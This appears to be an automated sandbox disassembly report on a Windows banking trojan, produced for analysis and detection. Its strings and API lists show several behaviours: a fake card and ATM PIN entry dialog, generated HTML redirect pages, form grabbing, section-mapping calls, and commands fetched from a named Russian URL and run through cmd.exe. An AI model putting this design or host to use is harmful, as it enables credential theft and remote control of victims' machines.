                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
